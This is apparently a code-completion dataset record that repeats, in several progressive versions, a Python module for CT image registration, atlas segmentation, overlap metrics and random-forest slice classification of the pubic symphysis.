lin_transformation.SetOptimizerAsGradientDescent(learningRate=1,
numberOfIterations=400, convergenceMinimumValue=1e-06,
convergenceWindowSize=10)
lin_transformation.SetOptimizerScalesFromPhysicalShift()
lin_transformation.SetInitialTransform(initial_transform)
lin_xfm = lin_transformation
if show_parameters:
print(lin_xfm)
return lin_xfm
def est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):
reg_method = sitk.ImageRegistrationMethod()
transform_to_displacement_field_filter = (sitk.
TransformToDisplacementFieldFilter())
transform_to_displacement_field_filter.SetReferenceImage(im_ref)
initial_transform = sitk.DisplacementFieldTransform(
transform_to_displacement_field_filter.Execute(sitk.Transform()))
initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0,
varianceForTotalField=1.5)
reg_method.SetInitialTransform(initial_transform)
reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)
if fixed_mask is not None:
reg_method.SetMetricFixedMask(fixed_mask)
reg_method.SetInterpolator(sitk.sitkLinear)
reg_method.SetOptimizerAsGradientDescent(learningRate=1.0,
numberOfIterations=10, convergenceMinimumValue=1e-06,
convergenceWindowSize=10)
reg_method.SetOptimizerScalesFromPhysicalShift()
nl_xfm = reg_method
if show_parameters:
print(nl_xfm)
return nl_xfm
def apply_transf(im_ref, im_mov, trafo, show_parameters=False):
transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(
im_mov, sitk.sitkFloat32))
if show_parameters:
print(transf)
print('--------')
print('Optimizer stop condition: {0}'.format(trafo.
GetOptimizerStopConditionDescription()))
print('Number of iterations: {0}'.format(trafo.GetOptimizerIteration())
)
print('--------')
return transf
<|reserved_special_token_0|>
def distances(mask_img, seg_img):
hausdorff = sitk.HausdorffDistanceImageFilter()
overlap = sitk.LabelOverlapMeasuresImageFilter()
hausdorff.Execute(mask_img, seg_img)
overlap.Execute(mask_img, seg_img)
jaccard = overlap.GetJaccardCoefficient()
dice = overlap.GetDiceCoefficient()
hausdorff_distance = hausdorff.GetHausdorffDistance()
print('The Hausdorff distance: {}'.format(hausdorff_distance))
print('The Dice coefficient: {}'.format(dice))
print('The Jaccard coefficient: {}'.format(jaccard))
return None
def train_classifier(slice_list, vector_list):
x_train_list = []
for image in slice_list:
image_array = sitk.GetArrayFromImage(image)
image_array.resize((512, 512, 512))
for z in range(image_array.shape[2]):
x_train_list.append(image_array[:, :, z].flatten())
x_train = np.asarray(x_train_list, dtype=np.uint8)
y_train = None
for i in range(0, len(vector_list)):
if i == 0:
y_train = vector_list[i]
else:
y_train = np.concatenate([y_train, vector_list[i]])
trained_forest = RandomForestClassifier(n_estimators=150)
trained_forest.fit(x_train, y_train)
return trained_forest
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):
initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov,
sitk.ScaleSkewVersor3DTransform(), sitk.
CenteredTransformInitializerFilter.MOMENTS)
lin_transformation = sitk.ImageRegistrationMethod()
lin_transformation.SetMetricAsMeanSquares()
lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)
lin_transformation.SetMetricSamplingPercentage(0.01)
if mov_mask:
lin_transformation.SetMetricMovingMask(mov_mask)
lin_transformation.SetOptimizerAsGradientDescent(learningRate=1,
numberOfIterations=400, convergenceMinimumValue=1e-06,
convergenceWindowSize=10)
lin_transformation.SetOptimizerScalesFromPhysicalShift()
lin_transformation.SetInitialTransform(initial_transform)
lin_xfm = lin_transformation
if show_parameters:
print(lin_xfm)
return lin_xfm
def est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):
reg_method = sitk.ImageRegistrationMethod()
transform_to_displacement_field_filter = (sitk.
TransformToDisplacementFieldFilter())
transform_to_displacement_field_filter.SetReferenceImage(im_ref)
initial_transform = sitk.DisplacementFieldTransform(
transform_to_displacement_field_filter.Execute(sitk.Transform()))
initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0,
varianceForTotalField=1.5)
reg_method.SetInitialTransform(initial_transform)
reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)
if fixed_mask is not None:
reg_method.SetMetricFixedMask(fixed_mask)
reg_method.SetInterpolator(sitk.sitkLinear)
reg_method.SetOptimizerAsGradientDescent(learningRate=1.0,
numberOfIterations=10, convergenceMinimumValue=1e-06,
convergenceWindowSize=10)
reg_method.SetOptimizerScalesFromPhysicalShift()
nl_xfm = reg_method
if show_parameters:
print(nl_xfm)
return nl_xfm
def apply_transf(im_ref, im_mov, trafo, show_parameters=False):
transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(
im_mov, sitk.sitkFloat32))
if show_parameters:
print(transf)
print('--------')
print('Optimizer stop condition: {0}'.format(trafo.
GetOptimizerStopConditionDescription()))
print('Number of iterations: {0}'.format(trafo.GetOptimizerIteration())
)
print('--------')
return transf
def seg_atlas(common_img, ct_list, seg_list):
seg = []
image_list = []
for i in range(len(ct_list)):
trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=
seg_list[i], show_parameters=False)
final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(common_img)
resampler.SetInterpolator(sitk.sitkLinear)
resampler.SetTransform(final_trafo)
resampled_mask = resampler.Execute(seg_list[i])
resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)
seg.append(resampled_mask_data)
for i in range(len(seg)):
for j in range(i + 1, len(seg)):
arr1 = np.transpose(np.nonzero(seg[i]))
arr2 = np.transpose(np.nonzero(seg[j]))
arr1list = [tuple(e) for e in arr1.tolist()]
arr2list = [tuple(e) for e in arr2.tolist()]
arr1list.sort()
arr2list.sort()
intersections = list(set(arr1list).intersection(arr2list))
intersections.sort()
image_list.append(intersections)
intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(
image_list[2]))
intersection_list.sort()
image_array = sitk.GetArrayFromImage(common_img)
segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)
for x, y, z in intersection_list:
segmented_array[x, y, z] = 1
return segmented_array
def distances(mask_img, seg_img):
hausdorff = sitk.HausdorffDistanceImageFilter()
overlap = sitk.LabelOverlapMeasuresImageFilter()
hausdorff.Execute(mask_img, seg_img)
overlap.Execute(mask_img, seg_img)
jaccard = overlap.GetJaccardCoefficient()
dice = overlap.GetDiceCoefficient()
hausdorff_distance = hausdorff.GetHausdorffDistance()
print('The Hausdorff distance: {}'.format(hausdorff_distance))
print('The Dice coefficient: {}'.format(dice))
print('The Jaccard coefficient: {}'.format(jaccard))
return None
def train_classifier(slice_list, vector_list):
x_train_list = []
for image in slice_list:
image_array = sitk.GetArrayFromImage(image)
image_array.resize((512, 512, 512))
for z in range(image_array.shape[2]):
x_train_list.append(image_array[:, :, z].flatten())
x_train = np.asarray(x_train_list, dtype=np.uint8)
y_train = None
for i in range(0, len(vector_list)):
if i == 0:
y_train = vector_list[i]
else:
y_train = np.concatenate([y_train, vector_list[i]])
trained_forest = RandomForestClassifier(n_estimators=150)
trained_forest.fit(x_train, y_train)
return trained_forest
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):
initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov,
sitk.ScaleSkewVersor3DTransform(), sitk.
CenteredTransformInitializerFilter.MOMENTS)
lin_transformation = sitk.ImageRegistrationMethod()
lin_transformation.SetMetricAsMeanSquares()
lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)
lin_transformation.SetMetricSamplingPercentage(0.01)
if mov_mask:
lin_transformation.SetMetricMovingMask(mov_mask)
lin_transformation.SetOptimizerAsGradientDescent(learningRate=1,
numberOfIterations=400, convergenceMinimumValue=1e-06,
convergenceWindowSize=10)
lin_transformation.SetOptimizerScalesFromPhysicalShift()
lin_transformation.SetInitialTransform(initial_transform)
lin_xfm = lin_transformation
if show_parameters:
print(lin_xfm)
return lin_xfm
def est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):
reg_method = sitk.ImageRegistrationMethod()
transform_to_displacement_field_filter = (sitk.
TransformToDisplacementFieldFilter())
transform_to_displacement_field_filter.SetReferenceImage(im_ref)
initial_transform = sitk.DisplacementFieldTransform(
transform_to_displacement_field_filter.Execute(sitk.Transform()))
initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0,
varianceForTotalField=1.5)
reg_method.SetInitialTransform(initial_transform)
reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)
if fixed_mask is not None:
reg_method.SetMetricFixedMask(fixed_mask)
reg_method.SetInterpolator(sitk.sitkLinear)
reg_method.SetOptimizerAsGradientDescent(learningRate=1.0,
numberOfIterations=10, convergenceMinimumValue=1e-06,
convergenceWindowSize=10)
reg_method.SetOptimizerScalesFromPhysicalShift()
nl_xfm = reg_method
if show_parameters:
print(nl_xfm)
return nl_xfm
def apply_transf(im_ref, im_mov, trafo, show_parameters=False):
transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(
im_mov, sitk.sitkFloat32))
if show_parameters:
print(transf)
print('--------')
print('Optimizer stop condition: {0}'.format(trafo.
GetOptimizerStopConditionDescription()))
print('Number of iterations: {0}'.format(trafo.GetOptimizerIteration())
)
print('--------')
return transf
def seg_atlas(common_img, ct_list, seg_list):
seg = []
image_list = []
for i in range(len(ct_list)):
trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=
seg_list[i], show_parameters=False)
final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(common_img)
resampler.SetInterpolator(sitk.sitkLinear)
resampler.SetTransform(final_trafo)
resampled_mask = resampler.Execute(seg_list[i])
resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)
seg.append(resampled_mask_data)
for i in range(len(seg)):
for j in range(i + 1, len(seg)):
arr1 = np.transpose(np.nonzero(seg[i]))
arr2 = np.transpose(np.nonzero(seg[j]))
arr1list = [tuple(e) for e in arr1.tolist()]
arr2list = [tuple(e) for e in arr2.tolist()]
arr1list.sort()
arr2list.sort()
intersections = list(set(arr1list).intersection(arr2list))
intersections.sort()
image_list.append(intersections)
intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(
image_list[2]))
intersection_list.sort()
image_array = sitk.GetArrayFromImage(common_img)
segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)
for x, y, z in intersection_list:
segmented_array[x, y, z] = 1
return segmented_array
def distances(mask_img, seg_img):
hausdorff = sitk.HausdorffDistanceImageFilter()
overlap = sitk.LabelOverlapMeasuresImageFilter()
hausdorff.Execute(mask_img, seg_img)
overlap.Execute(mask_img, seg_img)
jaccard = overlap.GetJaccardCoefficient()
dice = overlap.GetDiceCoefficient()
hausdorff_distance = hausdorff.GetHausdorffDistance()
print('The Hausdorff distance: {}'.format(hausdorff_distance))
print('The Dice coefficient: {}'.format(dice))
print('The Jaccard coefficient: {}'.format(jaccard))
return None
def train_classifier(slice_list, vector_list):
x_train_list = []
for image in slice_list:
image_array = sitk.GetArrayFromImage(image)
image_array.resize((512, 512, 512))
for z in range(image_array.shape[2]):
x_train_list.append(image_array[:, :, z].flatten())
x_train = np.asarray(x_train_list, dtype=np.uint8)
y_train = None
for i in range(0, len(vector_list)):
if i == 0:
y_train = vector_list[i]
else:
y_train = np.concatenate([y_train, vector_list[i]])
trained_forest = RandomForestClassifier(n_estimators=150)
trained_forest.fit(x_train, y_train)
return trained_forest
def slice_probability(ct_image, classifier):
test_list = []
max_list = []
im_array = sitk.GetArrayFromImage(ct_image)
im_array.resize((512, 512, 512))
for z in range(im_array.shape[2]):
test_list.append(im_array[:, :, z].flatten())
test_array = np.asarray(test_list, dtype=np.uint8)
probabilities = classifier.predict_proba(test_array)
max = np.amax(probabilities, axis=0)[1]
for i, prob in enumerate(probabilities):
if prob[1] == max:
max_list.append(i)
if len(max_list) == 1:
print('Slice {} has highest probability which is: {}'.format(
max_list[0], max))
else:
print('Slices {} have the highest probability which is: {}'.format(
max_list, max))
return None
<|reserved_special_token_1|>
import SimpleITK as sitk
import numpy as np
from sklearn.ensemble import RandomForestClassifier
def est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):
initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov,
sitk.ScaleSkewVersor3DTransform(), sitk.
CenteredTransformInitializerFilter.MOMENTS)
lin_transformation = sitk.ImageRegistrationMethod()
lin_transformation.SetMetricAsMeanSquares()
lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)
lin_transformation.SetMetricSamplingPercentage(0.01)
if mov_mask:
lin_transformation.SetMetricMovingMask(mov_mask)
lin_transformation.SetOptimizerAsGradientDescent(learningRate=1,
numberOfIterations=400, convergenceMinimumValue=1e-06,
convergenceWindowSize=10)
lin_transformation.SetOptimizerScalesFromPhysicalShift()
lin_transformation.SetInitialTransform(initial_transform)
lin_xfm = lin_transformation
if show_parameters:
print(lin_xfm)
return lin_xfm
def est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):
reg_method = sitk.ImageRegistrationMethod()
transform_to_displacement_field_filter = (sitk.
TransformToDisplacementFieldFilter())
transform_to_displacement_field_filter.SetReferenceImage(im_ref)
initial_transform = sitk.DisplacementFieldTransform(
transform_to_displacement_field_filter.Execute(sitk.Transform()))
initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0,
varianceForTotalField=1.5)
reg_method.SetInitialTransform(initial_transform)
reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)
if fixed_mask is not None:
reg_method.SetMetricFixedMask(fixed_mask)
reg_method.SetInterpolator(sitk.sitkLinear)
reg_method.SetOptimizerAsGradientDescent(learningRate=1.0,
numberOfIterations=10, convergenceMinimumValue=1e-06,
convergenceWindowSize=10)
reg_method.SetOptimizerScalesFromPhysicalShift()
nl_xfm = reg_method
if show_parameters:
print(nl_xfm)
return nl_xfm
def apply_transf(im_ref, im_mov, trafo, show_parameters=False):
transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(
im_mov, sitk.sitkFloat32))
if show_parameters:
print(transf)
print('--------')
print('Optimizer stop condition: {0}'.format(trafo.
GetOptimizerStopConditionDescription()))
print('Number of iterations: {0}'.format(trafo.GetOptimizerIteration())
)
print('--------')
return transf
def seg_atlas(common_img, ct_list, seg_list):
seg = []
image_list = []
for i in range(len(ct_list)):
trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=
seg_list[i], show_parameters=False)
final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(common_img)
resampler.SetInterpolator(sitk.sitkLinear)
resampler.SetTransform(final_trafo)
resampled_mask = resampler.Execute(seg_list[i])
resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)
seg.append(resampled_mask_data)
for i in range(len(seg)):
for j in range(i + 1, len(seg)):
arr1 = np.transpose(np.nonzero(seg[i]))
arr2 = np.transpose(np.nonzero(seg[j]))
arr1list = [tuple(e) for e in arr1.tolist()]
arr2list = [tuple(e) for e in arr2.tolist()]
arr1list.sort()
arr2list.sort()
intersections = list(set(arr1list).intersection(arr2list))
intersections.sort()
image_list.append(intersections)
intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(
image_list[2]))
intersection_list.sort()
image_array = sitk.GetArrayFromImage(common_img)
segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)
for x, y, z in intersection_list:
segmented_array[x, y, z] = 1
return segmented_array
def distances(mask_img, seg_img):
hausdorff = sitk.HausdorffDistanceImageFilter()
overlap = sitk.LabelOverlapMeasuresImageFilter()
hausdorff.Execute(mask_img, seg_img)
overlap.Execute(mask_img, seg_img)
jaccard = overlap.GetJaccardCoefficient()
dice = overlap.GetDiceCoefficient()
hausdorff_distance = hausdorff.GetHausdorffDistance()
print('The Hausdorff distance: {}'.format(hausdorff_distance))
print('The Dice coefficient: {}'.format(dice))
print('The Jaccard coefficient: {}'.format(jaccard))
return None
def train_classifier(slice_list, vector_list):
x_train_list = []
for image in slice_list:
image_array = sitk.GetArrayFromImage(image)
image_array.resize((512, 512, 512))
for z in range(image_array.shape[2]):
x_train_list.append(image_array[:, :, z].flatten())
x_train = np.asarray(x_train_list, dtype=np.uint8)
y_train = None
for i in range(0, len(vector_list)):
if i == 0:
y_train = vector_list[i]
else:
y_train = np.concatenate([y_train, vector_list[i]])
trained_forest = RandomForestClassifier(n_estimators=150)
trained_forest.fit(x_train, y_train)
return trained_forest
def slice_probability(ct_image, classifier):
test_list = []
max_list = []
im_array = sitk.GetArrayFromImage(ct_image)
im_array.resize((512, 512, 512))
for z in range(im_array.shape[2]):
test_list.append(im_array[:, :, z].flatten())
test_array = np.asarray(test_list, dtype=np.uint8)
probabilities = classifier.predict_proba(test_array)
max = np.amax(probabilities, axis=0)[1]
for i, prob in enumerate(probabilities):
if prob[1] == max:
max_list.append(i)
if len(max_list) == 1:
print('Slice {} has highest probability which is: {}'.format(
max_list[0], max))
else:
print('Slices {} have the highest probability which is: {}'.format(
max_list, max))
return None
<|reserved_special_token_1|>
import SimpleITK as sitk
import numpy as np
from sklearn.ensemble import RandomForestClassifier
# # Estimation function # #
# --------------------------- #
# Linear registration function
# --------------------------- #
# --- Input --- #
# im_ref : The common image [numpy.ndarray]
# im_mov : The group image [numpy.ndarray]
# mov_mask : List of GROUP masks [list]
# show_parameters : If you want to see the parameters, false by default [boolean]
# --- Output --- #
# lin_xfm : Estimated transformation parameters [itk.simple.Transform]
def est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):
initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov, sitk.ScaleSkewVersor3DTransform(),
sitk.CenteredTransformInitializerFilter.MOMENTS)
# Initialize registration
lin_transformation = sitk.ImageRegistrationMethod()
# Set metrics
lin_transformation.SetMetricAsMeanSquares()
lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)
lin_transformation.SetMetricSamplingPercentage(0.01)
# Set mask
if mov_mask:
lin_transformation.SetMetricMovingMask(mov_mask)
# Gradient Descent optimizer
lin_transformation.SetOptimizerAsGradientDescent(learningRate=1, numberOfIterations=400,
convergenceMinimumValue=1e-6, convergenceWindowSize=10)
lin_transformation.SetOptimizerScalesFromPhysicalShift()
# Set the initial transformation
lin_transformation.SetInitialTransform(initial_transform)
# Switching to preferred variable
lin_xfm = lin_transformation
if show_parameters:
print(lin_xfm)
return lin_xfm
# # Estimation function # #
# --------------------------- #
# Non-linear 'Demons' registration function
# --------------------------- #
# --- Input --- #
# im_ref : The common image [numpy.ndarray]
# fixed_mask : The mask of common image, default is None [numpy.ndarray]
# show_parameters : If you want to see the parameters, false by default [boolean]
# --- Output --- #
# nl_xfm : Estimated transformation parameters [itk.simple.Transform]
def est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):
# Initialize the registration
reg_method = sitk.ImageRegistrationMethod()
# Create initial identity transformation.
transform_to_displacement_field_filter = sitk.TransformToDisplacementFieldFilter()
transform_to_displacement_field_filter.SetReferenceImage(im_ref)
initial_transform = sitk.DisplacementFieldTransform(
transform_to_displacement_field_filter.Execute(sitk.Transform()))
# Regularization. The update field refers to fluid regularization; the total field to elastic regularization.
initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0, varianceForTotalField=1.5)
# Set the initial transformation
reg_method.SetInitialTransform(initial_transform)
# Set Demons registration
reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)
# Evaluate the metrics only in the mask
if fixed_mask is not None:
reg_method.SetMetricFixedMask(fixed_mask)
# Set a linear interpolator
reg_method.SetInterpolator(sitk.sitkLinear)
# Set a gradient descent optimizer
reg_method.SetOptimizerAsGradientDescent(learningRate=1.0, numberOfIterations=10, convergenceMinimumValue=1e-6,
convergenceWindowSize=10)
reg_method.SetOptimizerScalesFromPhysicalShift()
# Switching to the preferred variable
nl_xfm = reg_method
if show_parameters:
print(nl_xfm)
return nl_xfm
# # Application function # #
# --------------------------- #
# Executes either the linear or the non-linear function
# --------------------------- #
# --- Input --- #
# im_ref : The common image [numpy.ndarray]
# im_mov : The group image [numpy.ndarray]
# trafo : The chosen transformation [numpy.ndarray]
# show_parameters : If you want to see the parameters, false by default [boolean]
# --- Output --- #
# final_image : Returns the registered image [numpy.ndarray]
def apply_transf(im_ref, im_mov, trafo, show_parameters=False):
# Perform registration (Executes it)
transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(im_mov, sitk.sitkFloat32))
if show_parameters:
print(transf)
print("--------")
print("Optimizer stop condition: {0}".format(trafo.GetOptimizerStopConditionDescription()))
print("Number of iterations: {0}".format(trafo.GetOptimizerIteration()))
print("--------")
return transf
# # Atlas segmentation function # #
# --------------------------- #
# Atlas-based segmentation using the CT images in 'ct_list'
# and corresponding segmentation masks from 'seg_list'.
# After that, majority voting to return a segmentation mask.
# --------------------------- #
# --- Input --- #
# common_img : The chosen COMMON image [sitk-image]
# ct_list : List of GROUP images [list]
# seg_list : List of GROUP masks [list]
# --- Output --- #
# segmented_array : The segmentation as an array [numpy.ndarray]
def seg_atlas(common_img, ct_list, seg_list):
# Creating the necessary lists
seg = []
image_list = []
# # REGISTRATION # #
for i in range(len(ct_list)):
# Adjusting the settings and applying
trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=seg_list[i], show_parameters=False)
final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)
# Perform registration on mask image
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(common_img)
resampler.SetInterpolator(sitk.sitkLinear)
resampler.SetTransform(final_trafo)
resampled_mask = resampler.Execute(seg_list[i])
resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)
seg.append(resampled_mask_data)
# # MAJORITY VOTING # #
for i in range(len(seg)):
for j in range(i + 1, len(seg)):
arr1 = np.transpose(np.nonzero(seg[i]))
arr2 = np.transpose(np.nonzero(seg[j]))
# Filling two lists
arr1list = [tuple(e) for e in arr1.tolist()]
arr2list = [tuple(e) for e in arr2.tolist()]
# Sorting both lists
arr1list.sort()
arr2list.sort()
# Creating necessary list & sorting
intersections = list(set(arr1list).intersection(arr2list))
intersections.sort()
image_list.append(intersections)
# Creating a list which contains the indexes of intersecting voxels
intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(image_list[2]))
# Sorting the list
intersection_list.sort()
# Fetches array from image
image_array = sitk.GetArrayFromImage(common_img)
# Creates an array for the points and fills it using indexes
segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)
for x, y, z in intersection_list:
segmented_array[x, y, z] = 1
return segmented_array
# # Similarity function # #
# --------------------------- #
# Calculates the following distances between images:
# 1. Jaccard coef.
# 2. Dice coef.
# 3. Hausdorff distance
# --------------------------- #
# --- Input --- #
# mask_img : The mask image [sikt-image]
# seg_img: The segmented image [sikt-image]
# --- Output --- #
# None
def distances(mask_img, seg_img):
# Creating the necessary filters
hausdorff = sitk.HausdorffDistanceImageFilter()
overlap = sitk.LabelOverlapMeasuresImageFilter()
# Execute filters
hausdorff.Execute(mask_img, seg_img)
overlap.Execute(mask_img, seg_img)
# Fetching the distances and appending to distance list
# Jaccard coef.
jaccard = overlap.GetJaccardCoefficient()
# Dice coef.
dice = overlap.GetDiceCoefficient()
# Hausdorff distance
hausdorff_distance = hausdorff.GetHausdorffDistance()
# Printing out the distances for user
print('The Hausdorff distance: {}'.format(
hausdorff_distance))
print('The Dice coefficient: {}'.format(dice))
print('The Jaccard coefficient: {}'.format(jaccard))
return None
# # Classifier Function # #
# --------------------------- #
# Trains a random forest classifier by reading 2d images and comparing
# them to a vector which has labels that correspond to if it contains
# the pubic symphysis. The labels are binary.
# --------------------------- #
# --- Input --- #
# slice_list : List of 2D slice images [list]
# vector_list : List of vectors with binary labels [list]
# --- Output --- #
# trained_forest : Trained random forest classifier [sklearn.ensemble.forest.RandomForestClassifier]
def train_classifier(slice_list, vector_list):
# Creating necessary list
x_train_list = []
# Reading in input data
for image in slice_list:
# Fetching arrays
image_array = sitk.GetArrayFromImage(image)
# Resizing
image_array.resize((512, 512, 512))
for z in range(image_array.shape[2]):
x_train_list.append(image_array[:, :, z].flatten())
x_train = np.asarray(x_train_list, dtype=np.uint8)
# Reading in training labels
y_train = None
for i in range(0, len(vector_list)):
if i == 0:
y_train = vector_list[i]
else:
y_train = np.concatenate([y_train, vector_list[i]])
# Train classifier
trained_forest = RandomForestClassifier(n_estimators=150)
trained_forest.fit(x_train, y_train)
return trained_forest
# # Classifier Function # #
# --------------------------- #
# Utilizes a trained random forest classifier by reading CT image and prints
# which slice has the highest probability of containing the pubic symphysis.
# --------------------------- #
# --- Input --- #
# ct_image : List of 2D axial slice images [list]
# classifier : Trained random forest classifier [sklearn.ensemble.forest.RandomForestClassifier]
# --- Output --- #
# None
def slice_probability(ct_image, classifier):
# Creating necessary lists
test_list = []
max_list = []
# Convert image to numpy array & resize
im_array = sitk.GetArrayFromImage(ct_image)
im_array.resize((512, 512, 512))
for z in range(im_array.shape[2]):
test_list.append(im_array[:, :, z].flatten())
test_array = np.asarray(test_list, dtype=np.uint8)
# Predict probabilities for each slice
probabilities = classifier.predict_proba(test_array)
# Fetching array with maximum probabilities
max = np.amax(probabilities, axis=0)[1]
for i, prob in enumerate(probabilities):
if prob[1] == max:
max_list.append(i)
# Print result to user
if len(max_list) == 1:
print("Slice {} has highest probability which is: {}".format(max_list[0], max))
else:
print("Slices {} have the highest probability which is: {}".format(max_list, max))
return None
|
flexible
|
{
"blob_id": "2b7d9ded82fa980eeae06beb2d84d89612d53df1",
"index": 821,
"step-1": "<mask token>\n\n\ndef est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):\n initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov,\n sitk.ScaleSkewVersor3DTransform(), sitk.\n CenteredTransformInitializerFilter.MOMENTS)\n lin_transformation = sitk.ImageRegistrationMethod()\n lin_transformation.SetMetricAsMeanSquares()\n lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)\n lin_transformation.SetMetricSamplingPercentage(0.01)\n if mov_mask:\n lin_transformation.SetMetricMovingMask(mov_mask)\n lin_transformation.SetOptimizerAsGradientDescent(learningRate=1,\n numberOfIterations=400, convergenceMinimumValue=1e-06,\n convergenceWindowSize=10)\n lin_transformation.SetOptimizerScalesFromPhysicalShift()\n lin_transformation.SetInitialTransform(initial_transform)\n lin_xfm = lin_transformation\n if show_parameters:\n print(lin_xfm)\n return lin_xfm\n\n\ndef est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):\n reg_method = sitk.ImageRegistrationMethod()\n transform_to_displacement_field_filter = (sitk.\n TransformToDisplacementFieldFilter())\n transform_to_displacement_field_filter.SetReferenceImage(im_ref)\n initial_transform = sitk.DisplacementFieldTransform(\n transform_to_displacement_field_filter.Execute(sitk.Transform()))\n initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0,\n varianceForTotalField=1.5)\n reg_method.SetInitialTransform(initial_transform)\n reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)\n if fixed_mask is not None:\n reg_method.SetMetricFixedMask(fixed_mask)\n reg_method.SetInterpolator(sitk.sitkLinear)\n reg_method.SetOptimizerAsGradientDescent(learningRate=1.0,\n numberOfIterations=10, convergenceMinimumValue=1e-06,\n convergenceWindowSize=10)\n reg_method.SetOptimizerScalesFromPhysicalShift()\n nl_xfm = reg_method\n if show_parameters:\n print(nl_xfm)\n return nl_xfm\n\n\ndef apply_transf(im_ref, im_mov, trafo, show_parameters=False):\n transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(\n im_mov, sitk.sitkFloat32))\n if show_parameters:\n print(transf)\n print('--------')\n print('Optimizer stop condition: {0}'.format(trafo.\n GetOptimizerStopConditionDescription()))\n print('Number of iterations: {0}'.format(trafo.GetOptimizerIteration())\n )\n print('--------')\n return transf\n\n\n<mask token>\n\n\ndef distances(mask_img, seg_img):\n hausdorff = sitk.HausdorffDistanceImageFilter()\n overlap = sitk.LabelOverlapMeasuresImageFilter()\n hausdorff.Execute(mask_img, seg_img)\n overlap.Execute(mask_img, seg_img)\n jaccard = overlap.GetJaccardCoefficient()\n dice = overlap.GetDiceCoefficient()\n hausdorff_distance = hausdorff.GetHausdorffDistance()\n print('The Hausdorff distance: {}'.format(hausdorff_distance))\n print('The Dice coefficient: {}'.format(dice))\n print('The Jaccard coefficient: {}'.format(jaccard))\n return None\n\n\ndef train_classifier(slice_list, vector_list):\n x_train_list = []\n for image in slice_list:\n image_array = sitk.GetArrayFromImage(image)\n image_array.resize((512, 512, 512))\n for z in range(image_array.shape[2]):\n x_train_list.append(image_array[:, :, z].flatten())\n x_train = np.asarray(x_train_list, dtype=np.uint8)\n y_train = None\n for i in range(0, len(vector_list)):\n if i == 0:\n y_train = vector_list[i]\n else:\n y_train = np.concatenate([y_train, vector_list[i]])\n trained_forest = RandomForestClassifier(n_estimators=150)\n trained_forest.fit(x_train, y_train)\n return trained_forest\n\n\n<mask token>\n",
